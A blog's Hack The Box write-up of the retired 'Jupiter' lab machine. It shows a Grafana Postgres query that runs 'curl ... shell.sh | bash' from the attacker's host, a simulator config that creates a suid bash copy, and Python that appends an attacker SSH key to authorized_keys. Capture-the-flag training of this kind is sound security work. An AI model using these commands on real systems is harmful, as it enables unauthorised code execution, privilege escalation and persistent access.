Shubham Kumar HomeAboutDonateSubscribeArchivesCategoriesTagsProjectsContact Me
Hackthebox - Jupiter
|htbmachinesretired|0 Comments

Initial Scan

sql
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
# Nmap 7.93 scan initiated Sun Jun  4 21:06:48 2023 as: nmap -sC -sV -oN nmap/jupiter 10.10.11.216
Nmap scan report for 10.10.11.216
Host is up (0.044s latency).
Scanned at 2023-06-04 21:06:48 IST for 9s
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 ac5bbe792dc97a00ed9ae62b2d0e9b32 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBEJSyKmXs5CCnonRCBuHkCBcdQ54oZCUcnlsey3u2/vMXACoH79dGbOmIHBTG7/GmSI/j031yFmdOL+652mKGUI=
|   256 6001d7db927b13f0ba20c6c900a71b41 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHhClp0ailXIfO0/6yw9M1pRcZ0ZeOmPx22sO476W4lQ
80/tcp open  http    nginx 1.18.0 (Ubuntu)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to http://jupiter.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jun  4 21:06:57 2023 -- 1 IP address (1 host up) scanned in 9.37 seconds

kiosk.jupiter.htb

On the Krisk we can perform SQL Queries

sql
1
2
3
4
SELECT table_name
  FROM information_schema.tables
 WHERE table_schema='public'
   AND table_type='BASE TABLE';

We get Command Execution using

http
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
POST /api/ds/query HTTP/1.1

Host: kiosk.jupiter.htb

Content-Length: 393

x-plugin-id: postgres

x-grafana-org-id: 1

x-panel-id: 24

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.50 Safari/537.36

content-type: application/json

accept: application/json, text/plain, */*

x-dashboard-uid: jMgFGfA4z

x-datasource-uid: YItSLg-Vz

Origin: http://kiosk.jupiter.htb

Referer: http://kiosk.jupiter.htb/d/jMgFGfA4z/moons?orgId=1&refresh=1d

Accept-Encoding: gzip, deflate

Accept-Language: en-GB,en-US;q=0.9,en;q=0.8

Connection: close



{"queries":[{"refId":"A","datasource":{"type":"postgres","uid":"YItSLg-Vz"},"rawSql":"copy (SELECT '') to program 'curl http://10.10.14.31:8000/shell.sh | bash';","format":"table","datasourceId":1,"intervalMs":60000,"maxDataPoints":939}],"range":{"from":"2023-06-06T11:40:29.889Z","to":"2023-06-06T17:40:29.889Z","raw":{"from":"now-6h","to":"now"}},"from":"1686051629889","to":"1686073229889"}

After getting a shell as postgres

and running pspy

https://shadow.github.io/docs/guide/getting_started_basic.html

With

yaml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
general:
  # stop after 10 simulated seconds
  stop_time: 10s
  # old versions of cURL use a busy loop, so to avoid spinning in this busy
  # loop indefinitely, we add a system call latency to advance the simulated
  # time when running non-blocking system calls
  model_unblocked_syscall_latency: true

network:
  graph:
    # use a built-in network graph containing
    # a single vertex with a bandwidth of 1 Gbit
    type: 1_gbit_switch

hosts:
  # a host with the hostname 'server'
  server:
    network_node_id: 0
    processes:
    - path: /usr/bin/cp
      args: /usr/bin/bash /dev/shm/f3v3r
      start_time: 1s
    # three hosts with hostnames 'client1', 'client2', and 'client3'
  client:
    network_node_id: 0
    quantity: 1
    processes:
    - path: /usr/bin/chmod
      args: u+s /dev/shm/f3v3r
      start_time: 5s

I was able to create a bash binary with suid bit set and get a shell as juno

Juno

Checking the id

elixir
1
2
3
juno@jupiter:/opt$ id
uid=1000(juno) gid=1000(juno) groups=1000(juno),1001(science)
juno@jupiter:/opt$

We get the token from the logs in /opt/solar-flares/logs and using that we get access to juptor

Using the jupyter we can inject python code and use that to put my ssh key in authorized_keys

moonscript
1
2
import os
os.system("mkdir -p /home/jovian/.ssh;echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDQTlgEe+DpjhYguKzjEal24Zrq3P0fkVq+kRyKo598UTWCSGJyojsbfVZD5fhWZ2uZgMIO5MZqkXlaRm60vFAh/dmgfnXdA7Ra2ZfKu9OfYKaXvZD8TMs7g9+15ozh/RPbq/XuSGpHnAmM9oIt3U3dWfx5fK+X7U1TdY0OCyIBKqi2gB+0g4aRPbz4Cn5Ozztn3/WlNa0XLFl8bzJONpLIhLdYEZsK5fSu/242nGRiW5oIxUNRqHBj+S2nMP7os0oaE87oI8gDAOESqWdjkIKNeEODy2lYK45orBxQsg1+J3EFqQypHWZamJKUQ2nCZSZByWAXAjwnzuH9ECYgfgErcxMMZUk8sDqGKdrq+kn9btD2pmg6/QkV4UKq3evxYr5gJW2Q2e6v1I0dY/nUCEGt9AeoO7dC55MBfqa48UdMW0rKkf2qduTNT8GNxTxN3F8ouiu2GPEf8lzVb5yc8O8YtzEKWXg4wbR0A2elD5foAxgEP5mZpZXstDxWuiBSMjk=' >> /home/jovian/.ssh/authorized_keys")

We see we the sattrack is owned by jovian

Author: Shubham Kumar
Link: https://f3v3r.in/htb/machines/retired/jupiter/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.
linuxwriteupretiredhacktheboxmedium